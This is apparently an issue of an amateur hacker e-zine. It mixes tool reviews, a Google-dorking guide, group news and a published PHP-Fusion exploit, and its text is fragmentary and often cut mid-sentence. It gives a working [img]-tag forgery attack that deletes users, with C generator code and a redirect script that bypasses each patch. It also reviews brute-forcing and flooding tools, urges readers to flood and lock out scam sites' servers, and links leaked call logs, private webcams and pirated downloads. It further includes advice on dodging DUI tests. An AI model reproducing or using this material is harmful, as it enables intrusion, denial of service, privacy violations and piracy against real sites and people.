Professional Documents
Culture Documents
issue 04
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
in this issue: <|
department of corrections <|
limewire pro 4 all <|
reviews <|
getting out of duis <|
links <|
webcam directory update <|
alexa spyware+project info <|
google mining guide <|
antidote update <|
php-fusion exploit <|
robot files with access diver <|
bellsouth doc droppage <|
webcam update <|
spread lynn-cisco project <|
the realist's manifesto <|
mail.b0x <|
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
=================
= corrections =
=================
current members:
7j-7193-5396
curls-guided
7h-jxfd-x469
trails-gallop
7j-6404-1115
flies-pour
3h-jxpl-p552
spins-cube
7j-6774-1063
monied-visas
0h-jx4y-g424
cool-play
7j-6774-1069
phoned-ward
9h-jx6v-u522
desert-petite
7j-6774-1060
lyes-vernal
5h-jx6k-3017
border-anchor
7j-6774-1069
phoned-ward
9h-jx6v-u522
desert-petite
7j-6354-6766
field-capper
2h-jxkc-h695
pink-level
7j-7854-2215
hawked-polers
0h-jx7f-v517
puzzle-venus
directory snooping on limewire, found the latest pro downloads for the following
operating
systems: windows, mac osx, mac
of course you should buy a copy and not just download it without paying! this is
just to show
you what you can get from
filenames:
windows: limewirewin.exe
mac osx: limewireosx.dmg
mac classic (frozen at 4.0): limewiremac.bin
linux (rpm): limewirelinux.rpm
other (os/2, solaris, linux): limewireother.zip
mirrors:
http://sales.limewire.com/041225/fkzbpt8eru3r2jrmge1hr7adqr3bkzk3/
http://sales.limewire.com/041225/fkzbpt8eru3r2jrmge1hr7adqr3bkzk3/beta/
isn't directory snooping fun? well, as we said you should buy a copy not just
download it! we
are in no way responsible if
===============
= reviews =
===============
access diver [accessdiver.com] 5/5
this is an awesome cracking tool. it has automated site scans, http brute forcing,
form
bruting,
word list editor, word list duplicate remover, proxy leecher, proxy scanner,
proxy analyzer, and many other awesome tools. i would highly recommend this
software for
anybody
looking for some good cracking software. it is free software which is a big plus
in my book.
some. it automatically filters out virtual addresses and can change it based on
which company
you want to make it look like
made it.
"1net corporation ;003070
2wire, inc ;000d72
2wire, inc. ;00d09e
360 systems ;000556
360sun digital broadband corporation ;000e60
"
the config file is absolutely huge because of all the mac addresses. this is
really nice
software and it gets the job done.
all the crap adobe throws on your system so i found this one. it is nice scumware
free
software and will even set itself as
features:
.httaccess brute forcer
anonymous ftp scanner
bios master passwords
cd player
cgi vuln. scanner
country codes (.de etc)
dictionary generator
dns and reverse dns lookup
domain scanner (portscanner)
file compare
ftp brute forcer
get server services
get cached passwords
hex/dec/bin/ascii converter
html grabber
irc brute forcer
irc flooder
link-looker
netbios password cracker
secure password generator
ping/traceroute
port2service [what services use which port]
portflooder
portscanner
local port checker
port watcher
screensaver cracker
simple mail (can use to mailbomb with anonymous mail servers)
oob nuker
telnet brute forcer
whois info
========================
= getting out of duis =
==by: sheepbyte=========
duis can be a tough battle to fight. if you are guilty and it didn't happen as an
accident do
not use these techniques. you
should go straight to jail. that being said, the tests for drunk driving can be
very
inaccurate and as a result may get you
in for something you haven't done. if you get pulled over make sure you have your
papers and
all your information in the
glove compartment and you know where they are. if you look like you know what you
are doing
then you will look less drunk and
you may avoid a test. the officer will probably ask if you have had anything to
drink. there
are several paths you could take
here. outright saying no will raise a red flag because you probably weren't
driving well in
the first place. you may choose
to say you had some to drink with your friends, but you thought you had less than
the legal
limit. remember: don't be
defensive, be courteous. you could say that you think you may have had too much to
drink and
that you are tired. casually
mention that you think it would be best if you didn't drive anymore and the
officer may offer
you a ride home. you may even
request a safe ride, and most officers won't deny you a ride if you say you
shouldn't be on
the road because it makes them
liable. if he does then take this option!!!!! this will get you home and off
clean. don't be
afraid to ride with the officer
as this won't hurt you. if he arrests you, you are a whole other league and i
won't cover
that. some people think drinking
listerine will work and in some cases it does. this only works in some states. in
many states
this will only get the officer
mad that you are trying to lie to him and he will do everything to get you in
trouble. at some
point during the questioning
he will ask you if you have any weapons. if you have weapons tell him so. lying
about this can
land you some time in jail.
remember these tips:
1. look organized
2. don't lie about weapons
3. don't be defensive
4. be courteous and respectful
5. if he offers, take the ride home.
many people get caught in the dui dragnet and hopefully this will help you. again,
if you are
driving drunk and were being
stupid or had it happen before then go to jail and learn your lesson.
===============
= links =
===============
[reverse-engineering.net]
this site has some good resources and a cool forum.
[reteam.org]
this is a good reverse engineering site with some nice forums. it's l337 so go!
[pandora-security.com]
an awesome site i found out about through irc. this is true hacking none of this
cracking or
botnet shit. run by my good friend 34109!
[bash.org]
funny stuff from irc. vote for your favorite.
[phrack.org]
phrack 63 is out so download it and read it.
[http://thedigitalremix.com/remixradio/]
a new hacker radio show that i've been watching. looks like it will be pretty
cool. i got
interviewed so it should be
uber-leet.
[shellcoders.com]
a site about programming and hacking by my friend sintigan. anybody who is
registered is
uber-leet so check it out.
[http://www.2600.com/photos/]
was coley trying to start an image gallery?
===============
= webcam =
= directory =
===============
we are closing down the webcam directory. it looks as if nobody is contributing so
there is no
reason to keep it up. we may re-launch it at a later time.
===============
= alexa =
= + =
= spyice =
===============
we are starting a new project at the antidote which will be a new approach to
spyware. instead
of simply defending users
this goes to what appears to be the page ranker. i'm not sure quite how it works
but here is
part of the packet dump. any areas covered with xs may be private or revealing
information.
if you can't tell i was using ie6 infected with alexa toolbar 7.0. this has to be
the first
time i have deliberately installed such scum on my machine.
another cookie:
0000 00 09 5b 85 81 34 00 c0 fe 01 01 01 08 00 45 00 ..[..4........e.
0010 01 d9 76 96 40 00 80 06 f3 ef c0 a8 00 1c 41 36 ..v.@.........a6
0020 8c 9e 13 28 00 50 67 b1 8d 9d 53 be 41 e8 50 18 ...(.pg...s.a.p.
0030 42 30 0d 09 00 00 47 45 54 20 2f 63 2e 67 69 66 b0....get /c.gif
0040 3f 6e 61 3d 31 31 35 34 26 6e 63 3d 31 30 30 30 ?na=1154&nc=1000
0050 39 26 64 69 3d 33 34 30 26 70 69 3d 37 33 31 37 xxxxxxxxxxxxxxxx
0060 26 50 53 3d 38 33 39 36 37 26 54 50 3d 68 74 74 xxxxxguidxxxxxxx
0070 70 25 33 61 25 32 66 25 32 66 77 77 77 2e 6d 73 xxxxxxxxxxxxxxxx
0080 6e 2e 63 6f 6d 25 32 66 64 65 66 61 75 6c 74 2e n.com%2fdefault.
0090 61 72 6d 78 20 48 54 54 50 2f 31 2e 31 0d 0a 41 armx http/1.1..a
00a0 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 52 65 66 65 ccept: */*..refe
00b0 72 65 72 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e rer: http://www.
00c0 6d 73 6e 2e 63 6f 6d 2f 0d 0a 41 63 63 65 70 74 msn.com/..accept
00d0 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 2d 75 73 -language: en-us
00e0 0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e ..accept-encodin
00f0 67 3a 20 67 7a 69 70 2c 20 64 65 66 6c 61 74 65 g: gzip, deflate
0100 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f ..user-agent: mo
0110 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 6f 6d 70 61 zilla/4.0 (compa
0120 74 69 62 6c 65 3b 20 4d 53 49 45 20 36 2e 30 3b tible; msie 6.0;
0130 20 57 69 6e 64 6f 77 73 20 4e 54 20 35 2e 31 3b windows nt 5.1;
0140 20 2e 4e 45 54 20 43 4c 52 20 31 2e 31 2e 34 33 .net clr 1.1.43
0150 32 32 3b 20 41 6c 65 78 61 20 54 6f 6f 6c 62 61 22; alexa toolba
0160 72 29 0d 0a 48 6f 73 74 3a 20 63 2e 6d 73 6e 2e r)..host: c.msn.
0170 63 6f 6d 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a com..connection:
0180 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f keep-alive..coo
0190 6b 69 65 3a 20 43 55 4c 54 55 52 45 3d 65 6e 2d kie: culture=en-
01a0 55 53 3b 20 6d 68 3d 4d 53 46 54 3b 20 4d 43 31 us; mh=msft; mc1
01b0 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx =v=2&guid=xxxxxx
01c0 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxguidxxxxxxxxxx
01d0 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxx; spee
01e0 44 3d 42 0d 0a 0d 0a d=b....
url request:
0000 00 09 5b 85 81 34 00 c0 fe 01 01 01 08 00 45 00 ..[..4........e.
0010 01 d9 76 96 40 00 80 06 f3 ef c0 a8 00 1c 41 36 ..v.@.........a6
0020 8c 9e 13 28 00 50 67 b1 8d 9d 53 be 41 e8 50 18 ...(.pg...s.a.p.
0030 42 30 0d 09 00 00 47 45 54 20 2f 63 2e 67 69 66 b0....get /c.gif
0040 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
0050 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
0060 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
0070 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
0080 6e 2e 63 6f 6d 25 32 66 64 65 66 61 75 6c 74 2e n.com%2fdefault.
0090 61 72 6d 78 20 48 54 54 50 2f 31 2e 31 0d 0a 41 armx http/1.1..a
00a0 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 52 65 66 65 ccept: */*..refe
00b0 72 65 72 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e rer: http://www.
00c0 6d 73 6e 2e 63 6f 6d 2f 0d 0a 41 63 63 65 70 74 msn.com/..accept
00d0 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 2d 75 73 -language: en-us
00e0 0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e ..accept-encodin
00f0 67 3a 20 67 7a 69 70 2c 20 64 65 66 6c 61 74 65 g: gzip, deflate
0100 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f ..user-agent: mo
0110 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 6f 6d 70 61 zilla/4.0 (compa
0120 74 69 62 6c 65 3b 20 4d 53 49 45 20 36 2e 30 3b tible; msie 6.0;
0130 20 57 69 6e 64 6f 77 73 20 4e 54 20 35 2e 31 3b windows nt 5.1;
0140 20 2e 4e 45 54 20 43 4c 52 20 31 2e 31 2e 34 33 .net clr 1.1.43
0150 32 32 3b 20 41 6c 65 78 61 20 54 6f 6f 6c 62 61 22; alexa toolba
0160 72 29 0d 0a 48 6f 73 74 3a 20 63 2e 6d 73 6e 2e r)..host: c.msn.
0170 63 6f 6d 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a com..connection:
0180 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f keep-alive..coo
0190 6b 69 65 3a 20 43 55 4c 54 55 52 45 3d 65 6e 2d kie: culture=en-
01a0 55 53 3b 20 6d 68 3d 4d 53 46 54 3b 20 4d 43 31 us; mh=msft; mc1
01b0 3d 56 3d 32 26 47 55 49 44 3d 62 61 66 30 34 63 =v=2&guid=x
01c0 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
01d0 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
01e0 44 3d 42 0d 0a 0d 0a d=b....
here are the changes it made to my system during the install. again xxxxxs
indicate bleeped
out information. i tracked this information with total-uninstall 3.0. which is
really great
software. i'm not including things like temp files and modifications to system
logs in this.
a clsid is the equivalents of a guid.
it looks like they use web bugs to track users and things like
.gif?guid=xxxxx&requestip=xxxx
and it goes on like that. i was un-able to decode the tcp packets. it detected my
brand of
computer and told alexa what it was. this software is very scary and bonzi/gator
can only be
worse. a lesson here can be learned that you need to be careful with what you
download, run,
and let slip through your network.
anybody who knows anything about spyware or can code and would be willing to
participate
please
contact us. we need inside sources to tell us what all this means!! basically we
will be using
their techniques against them. we will spam the spyware databases with either
random data,
data with a message, or realistic-looking bullshit. we haven't decided quite how
this project
will end up, so we are still planning. the ~blindnet~ project will be on hold
until we get
this off to a good start. we might start a sourceforge project for this. it will
probably be
in c or a c variant and will run on win32/*nix systems. the information we find
out will all
be available online on a website containing information about these *evil*
companies in a
somewhat open format (almost a wiki). again, if you would like to help please drop
an email
to:
sheepbyte@gmail.com
================
= the =
= google =
= mining =
= guide =
= by: =
= sheepbyte =
= i'm @ gmail! =
================
what is google mining
commands
exploitation
resources
problems with it
corporate responsibility
conclusion
commands
---------
""
intitle:
inurl:
intext:
insite:
cache:
link:
related:
info:
definition:
stocks:
filetype:
movie:
fcc
patent
""
quotes can help you specify blocks of text. let's say you i'm ego-oogling on my
zine. i would
type "the intrahack zine" and get results only pertaining to it. if i typed in the
intrahack
zine i would get pages containing these combinations of words:
the
intrahack
zine
the intrahack
the zine
intrahack zine
that isn't very efficient is it? let's say i'm looking for manuals for the glass
front vendor
by dixie-narco. i could use this query:
"dixie-narco" "glass front" "manual"
if you go under advanced mode you can make sure all those terms are in the page.
intitle:
the intitle command ensure that something is in the title. let's say you are
looking for a
copy
of freedom downtime. you could type:
intitle:"index of /" "freedom" "downtime" ".avi"
this is a fairly insufficient search but we will get into more complicated
commands.
the key part to the above search is the intitle:"index of /" this makes sure the
file is in an
open ftp directory. some sites will spoof this, but generally you will get good
results. if
you want to look for a page with
inurl:
the inurl: function allows you to specify part of the url. let's say you are
looking for
"hitch" torrents. you could find blog torrent servers using this query:
inurl:/bt "hitch" "torrent"
you may not wish to add "torrent" because it will give you more hits. let's say
you want to
find
open directories on .mil sites. just use:
inurl:".mil" intitle:"index of /"
allinurl: can use multiple words.
intext:
the intext: function is pretty useless. you can already just type it in the search
box or use
quotes to achieve the same results. if you type "free porn" in google you will get
sites that
may only contain that in the title or meta tags, intext: insures it is in the
text.
insite:
the insite command can be used to search a certain site. now this is fairly
useless because
you already have the same command as insite: called inurl:. let's say you are
searching binrev
forums for a post about catsex. you could use this query:
insite:binrev.com "catsex"
you could also use the inurl: function to achieve the same results. inurl: will
turn up hits
from
archive.org and other mirrors so insite: does a little better at this. site: will
also achieve
the same effect.
cache:
you can use the cache: command to find googles cache of a site. at one point
tiz.brokenfloppy.com had no bandwidth left so you could have used
cache:tiz.brokenfloppy.com
to
see it. many pdf files and other files are available only through cache and other
archive
services. i believe you can send a request to google to remove your site but i
think you have
to find the email.
link:
this query will return all pages that link to a certain page. let's say i'm
looking for pages
that link to
related:
this query returns pages that are related to other pages. related:bellsmind.net
turns up
several good results.
info:
this returns info about a certain page or site. info:binrev.com returns some of
the news from
the site. this can also be
definition:
this will give you the definition of a word. pretty self-explanatory. you can also
use
define:.
stocks:
this will return stock information. if you want to see multiple stocks such as
microsoft and
aol type stocks:msft aol
filetype:
the filetype: function will only return files of a certain type. let's say you are
looking for
manuals in the pdf format.
movie:
use the movie: function to find information out about a movie.
fcc
use "fcc fccid" to find fcc information on a specific device.
patent
use "patent patentnum" to find patent information.
you can also do math queries. type 5+2 and google will tell you the answer is 7.
you can also do currency conversions in this format: 3.5 usd in gbp
exploitation
------------
many exploits for web applications come out every day. google enables skiddies to
do mass
site defacements. let's say there is an exploit for php-nuke. what you can do is
go in to
google
and type something all the pages run by that system have in common. most cmss have
a
little "created by" thing at the bottom or something similar to it is easy to
identify sites.
once you have searched you just rip all the urls and run them through a perl
script to make
the exploit urls. exploitation and defacement is suddenly a breeze. it really
takes no skill
to deface websites with cms exploits and that is why so many people do it. they do
it to
impress their friends, to feel good about themselves, or to please their ego. if
you are doing
mass defacements you don't deserve to be part of the internet.
resources
---------
there are many places with information on google mining/hacking. for specific
queries check
out johnny.ihackstuff.com
for google mining questions contact me or go to binrev.com/forums to the google
mining
section. there is a lot more to be
learned in this area. i haven't included specific queries because it would take
thousands of
pages and would just be
worthless filler. there are some books out there on google mining and most forums
will have
members willing to help. google
problems with it
----------------
the only problems with google mining that restrains you from everything are
robots.txt files
and linking. google obeys
robots.txt files which could seriously hamper your results on specific sites. if a
page
doesn't link to a page you are
looking for, google won't find it. programs like winhttrack will even look in
source to find
pages, so for site-specific
corporate responsibility
-------------------------
where does personal responsibility end and corporate responsibility start? many
people say
google shouldn't allow users to search for exploited pages. there are several
problems with
this
proposal. first off, it would only become a race between google and the
exploiters. google is
no more capable to block exploits than people are to find and use them. there is a
system in
place called the robots.txt file to help you if you are a super-paranoid admin.
there was an
article in the most recent 2600
can help you achieve just that. this article does not cover all of googles
features, it only
covers ones that can go in the
search box. using services to find things has always been a skill a hacker needs
and google is
just another service like many
other before us. from using the list command in irc to the inurl: command in
google,
information is always the goal. if you
===============
= antidote =
= update =
===============
please welcome anonymous, anonymous, anonymous, anonymous, anonymous, anoynmous,
anonymous,
anonymous, and anonymous to the antidote!
we apologize for not revealing member names but as you know, this is sensitive
business.
check out our new site at:
antidote.kazasena.com
if you are a member of the lad wrecking crew of you know how to get in contact
with them
please contact us!
we had a member join by the name of phatal. he hangs out on irc at
irc.undergroundnews.com
beware! phatal is a fed! shortly after he joined one of our members couldn't
remember us or
what we had done, he left, and
never came back. in other words, arrested.
i would advise everybody to stay away from him. we had lots of weird activity
since his
joining. stay away. stay safe.
there has been lots going on in the antidote labs. we have our own members only
irc channel
now. there are several project updates you should hear. the ~blindnet project is
bieng
discontinued until further notice however, we will finish it. the spyice peoject
is still very
active as well as the anti-phishing project phishice. we have sent tons of victim
and scammer
information to the authorities.
if you would like to contribute to the project please load the current super-leech
page
against mega-buck.com a fake lottery
site. we are now doing penetration testing on a server near you! organizations,
people we like,
and special requests may get a free or discounted rate. the standard rate for a
test is 100 u.s.
if we don't find any vulnerabilities you pay n-o-t-h-i-n-g! email
sheepbyte@gmail.com for more
information or catch him at the tiz irc channel.
we leeched all the bandwidth from mega-buck.com. another fake lottery bites the
dust.
you can log in to these admin accounts with bad passwords to lock them out:
administration
render
you can lock out the members also. there is a memberlist here:
http://antidote.kazasena.com/memberlist.txt
the aa419.org flashmob is occurring or is already done by the time you read this
but we still
need your help!
you can reload these fake banks pages. the targets are:
http://www.nationalfingroup.com/
http://www.alliancedcourier.com/
http://www.westernoceanic.com/
http://www.westminsterexpress.com/
http://www.co-baci.com/
http://www.ltbancorp.com/
http://www.reliancetrustbank.com/
http://www.fcbankuk.com/
http://www.cbonline-international.com/
http://www.tigon-line.com/
http://www.transatlanticinvest.org/
http://www.weststarexpress.com/
http://www.business.gfams.com/
http://www.ntbonline-cayman.com/
you can call the people who run these fake banks!!!
phone numbers:
+27 72-051-6240
+27 724156675
+34 686072781
+32 484 67 50 53
+31 646472805
+33 142748596
+44 709 203 4931
+44 (0) 845 686 0608
+44 1624 672211
+44 2084712109
+1 866-549-1347
+1 866-566-6285
+1 866-556-6234
+1 416 832-6837
+1 218 554-4756
if you wish to leech from a always updating large list of targets check out the
mugu marauder
and the lad vampire at
aa419.org. while the flashmob is occurring it will only leech from these targets.
for those who are interested in joining the battle against scammers you should
check out
419eater.com 419sport.com
419eater.com thescambaiter.com aa419.org and if you are so brave as to, join the
antidote by
emailing sheepbyte
thanks to everybody who has participated in this flashmob.
/exit
============================
= a new php-fusion exploit =
= found by easyex =
============================
quote:
two security flaws have recently been discovered in the ubb code parsing by two of
our users.
grindordie found that a user
could virtually deface areas of the site that utilise the [color] tags. while this
does not
cause any harm it can be rather
[img] tags without anyone knowing. as usual i have produced the required fixes.
the
sourceforge files have been updated,
existing users can download the new maincore.php file from the downloads area.
updated i've
refined the code and updated the
files. if you prefer to update the code yourself click read more for instructions.
source: http://www.php-fusion.co.uk/
/*
discovered/coded by easyex
using the [img] [/img] codes we can get an administrator to do a function a normal
member
cannot do.
for example..
[img]/administration/members.php?step=delete&sortby=all&rowstart=0&user_id=1[/img]
this could be in our signature, forum post or in a comment post. when an admin
views the page
with the malicious code it will
automatically load and do the function we selected. in the example it would delete
the member
with the id: 1
because we are using the [img] [/img] code it just shows up as an invalid image.
code usage:
<version> is the php-fusion version. enter 6.x or 5.x depending on the version
number.
so if we had a vulnerable host running php fusion v6.00.106 or below with say 150
users and we
wanted to delete them all we
would type ./fusionimg 6.x / deluser 1 150 or if we wanted to delete 1 user that
had the id: 5
we would type: ./fusionimg 6.x
/ deluser 5 5
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int usage() {
printf("usage: ./fusionimg <version> <dir> <option> <start> <end>\n");
printf("example: ./fusionimg 6.x / deluser 1 500\n");
exit(1);
}
printf("\n");
printf("php-fusion [img][/img] exploit\n");
printf("coded by easyex from the dark assassins crew\n\n");
if(argc < 6 )
usage();
int i;
char cmd[512];
char option[512];
char version[512];
file *log;
log = fopen("exploit.txt", "w+");
if(log == 0) {
printf("[-] error opening log file.\n");
exit(-1);;
}
if(strcmp(argv[1], "6.x") == 0) {
strncpy(version, "administration/", 512);
}
else {
printf("[-] error, invalid version!\n");
exit(-1);;
}
// there are other options you can do, this is just some of them...
// if you need to find out a users id you can just go to members.php and click
on the user
you want and the id will show
if(strcmp(argv[3], "deluser") == 0) {
strncpy(option, "members.php?step=delete&sortby=all&rowstart=0&user_id=",
512);
fprintf(log, "you have selected to delete %s > %s user(s)\n", argv[4],
argv[5]);
}
else {
printf("[-] error, invalid option!\n");
exit(-1);
}
fprintf(log, "add the following lines of code into your signature, forum post
or in a
comment post:\n\n");
old code:
code:
$ubbs1[10] = '#\[img\](.*?)\[/img\]#si';
$ubbs2[10] = '<img src=\'\1\' border=\'0\'>';
code:
code:
$ubbs1[10] = '#\[img\](.*?)(\.(jpg|jpeg|gif|png|jpg|jpeg|gif|png))\[/img\]#si';
$ubbs2[10] = '<img src=\'\1\2\' border=\'0\'>';
code:
[img]/administration/members.php?step=delete&sortby=all&rowstart=0&user_id=1[/img]
so that was the first example, but now the patch is up we have to bypass that
also, we can do
this by adding a .jpg
extension:
code:
[img]/administration
members.php?step=delete&sortby=all&rowstart=0&user_id=1&exploit=.jpg[/img]
you can add any image extension that is allowed and the php-fusion <= 6.0 106
bbcode img tag
script injection exploit will
to get it to work with the exploit code, if needed modify the following:
code:
to
code:
and it will now create the correct image tags for the people who are running the
patch.
php-fusion has made the 2nd update to the ubb code security patch to fix the
&exploit=.jpg
problem.
still exploitable. let's take a look at the latest ubb code security patch
code:
$ubbs1[10] =
"#\[img\]((http|ftp|https|ftps)://)(.*?)(\.(jpg|jpeg|gif|png|jpg|jpeg|gif|
png))\[/img\]#sie";
$ubbs2[10] = "'<img src=\'\\1'.str_replace(array('?','&','='),'','\\3').'\\4\'>'";
so now what it does is only allow http:// ftp:// etc in the [img] and it blocks ?
& = etc but
we can get around this...
we can create a directory on a remote host called 'exploit.jpg' or what ever you
like, and
then in the directory you would
code:
<?php
header("location:
http://example.com/administration/members.php?step=delete&sortby=all&rowstart=0&us
er_id=1&exploit=.jpg");
exit;
?>
so it thinks it's a image file, but really it isnt and it executes the index.php
script and
then the exploit works fine
again, but this time you have to include the host running php-fusion in that
index.php script.
then, you go to the host running php-fusion and then again put it in your
signature, make a
forum post, or comment post
example:
code:
[img]http://theremotehost.com/exploit.jpg[/img]
purpose
-------
use access diver to automate the process or scanning robots.txt files
supplies needed
---------------
access diver
sample robots.txt file
a parsing program
mining robot files is fairly easy with the right tools. first what we will do is
take a
robots.txt file.
access driver exploiter config files are formatted like this:
/urltoscan
root or local or fullurl
checked or unchecked
response code if any
#include <stdio.h>
#include <ctype.h>
void usage(void)
{
printf("./robots.txt <input file> <output file>\n");
}
char line[256];
char url[256];
if (argc < 3) {
usage();
exit(1);
}
printf("[+] robots parsing program\n");
printf("[+] written by stderr.\n");
printf("############################\n");
input_file = fopen(argv[1],"r");
if (input_file == 0) {
printf("error opening file.\n");
exit(1);
}
output_file = fopen(argv[2],"w");
if (output_file == 0) {
printf("error opening file.\n");
exit(1);
}
fclose(input_file);
fclose(output_file);
return 0;
}
"
once you have done this, save the output to robots1.ini in a directory you will
remember. now,
open access diver and go to
the exploiter tab. click on the folder icon and load the ini file. type the url
where you got
the robots file (like http://whitehouse.gov) and it will scan all the urls for
you. special
thanks to stderr for his
help on this.
this would be good for sites with long robots files like whitehouse.gov and
epa.gov
=================================
= bellsouth and government =
= doc droppage =
=================================
thanks to the careless management at pnn.gov.co you can see bellsouth call logs in
spanish for
over 100 people. we figured
we'd just give you the url instead of wgeting it. if anybody has an archive of
this site
please contact us so we can make it
available:
http://www.pnn.gov.co/docs/pruebas/moviles/coexistencia/bellsouth/
===========================
= webcam update =
===========================
thanks to snags of digital-deception.net for submitting these:
http://195.243.185.195/view/indexframe.shtml
airport in stuttgard, germany
http://webcam.rockdetente.com/view/indexframe.shtml
didn't bother doing a reverse and arin to find out where this one is, but there's
a nice chick
workin at this recording
studio
http://webcam.lajollademismaloya.com/view/indexframe.shtml
a resort
=============================
= spread lynn-cisco project =
=============================
the idea that people can't spread the lynn document on the cisco vuln is bullshit.
although
cisco has been hacked, we believe
mirrors. if you have a mirror set up email us a link. this is an effort to bypass
and stop
censorship. please join us in the
http://sr2.mytempdir.com/110387
http://rapidshare.de/files/3794495/lynn-cisco.pdf.html
http://www.jwdt.com/~paysan/lynn-cisco.pdf
http://www.warbard.ca/temp/lynn-cisco.pdf
http://www.viruswatch.nl/info/lynn-cisco.pdf
http://www.security.nnov.ru/files/lynn-cisco.pdf
===========================
= the realist's manifesto =
===========================
when i first saw this in "weapons of mass delusion" by richard forno i just had to
include it:
"i call myself a realist and this is my manifesto:
i am a realist. i live my life based on reality, not wishful
thinking, hyperbole, spin, empty promises, fear mongering,
or adherence to a single party platform. i will not subscribe to
a single party line, and most importantly, i pride myself on
routinely doing a very contemporary un-american thing by
thinking for myself and forming my own opinions on the issues
impacting on my life and nation."
i think this is a very important quote because it teaches us to think, speak, and
act as
ourselves and not to conform to the
prejiduce, biased, and corporate driven views that are forced upon us by
glutenous, rich, and
stuck-up american politicians
and businesses. this is not the entire manifesto but just the introduction. i
suggest you get
the book to read it. the
manifesto is in the beginning of the first chapter and is pages long. you can get
the book
online for free at the official website infowarrior.org
===============
= mail.b0x =
===============
i finally got a reply from yahoo geoities abuse. i listed the email that i sent
before but
i'll show it again in case you forgot.
======================
my email:
"dear geocities hosting,
you are hosting the site kenexfinances.com
this site is operating fraudelently and pretending to be an
online bank. there are many ways to tell this bank is fake.
the bank is not listed with any of the proper banking
authorities which is needs to be and there is no reference
of it on the web. the phone number listed resolve to
satellite phones and not actual phone lines. the site makes
outright lies about the operation of its buisness. the web
design is poor. this site has stolen graphics from other
sites along with text and superimposes its name on them. the
site insecurely stores member information which is directly
in the source of the web page. this site is listed with
aa419.org which is an anti 419 scam organization which works
very closely with many government bodies including the south
african police services website located at 419legal.org
the entry for this bank may be found at:
http://aa419.org/fake-banks/fakebanksview.php?key=4224
we request that you shut down this site immediately and save
a back-up of the data for federal authorities which may be
investigating this site. refusal or neglect to shut down
this site is a federal crime and you could be charged with
knowingly allowing criminal activities to occur on your
server.
please reply."
their reply:
"hello,
http://docs.yahoo.com/info/terms/geoterms.html
regards,
this email came about a month after they shut down the site but at least they got
around
to it.
=========================
got a reply from the "recover my accounts" guy who had like 10 "accounts" that got
hacked.
"hey. what if i get some one in russia to help me hack and get my acounts back??
will police
catch me? in russia poeple hack
casions websites , usa and ntto milatery bases u would know u are a hacker urself
and easy get
away with that . so if i get
reply:
"dear i.r.m.,
i sincerely don't believe these are your accounts. it is most likely the police
won't catch
you soon. the only way they would
catch you is if they caught the russian hacker but it will catch up to you in the
future.
maybe you should give up your petty
dreams with this stupid online game and move on. it is true that those hackers get
into us
computer systems such as military
and government computers but most of them get caught. it isn't easy to get away
from such a
crime because the us government
has unlimited rescources and you have your check from the bank. you will probably
not get in
trouble but bad people get their
shouts to
----------
34019 of pandora-security
xplicit pwned by his dsl and nickserv
?hate remix-radio
nunez is never on irc... wtf?
thefailure you know why *wink*
dexlyisc his freezer exploded. hahahahahahahahah!
phatal take your trash elsewhere fucker. ouch! slammed in a zine.
gizmo stop hovering. that was between me and him, stay out of it.
kazm thanks for all the help on the hacker torrents and the hosting!
the lwc thanks for the inspiration (lad wrecking crew)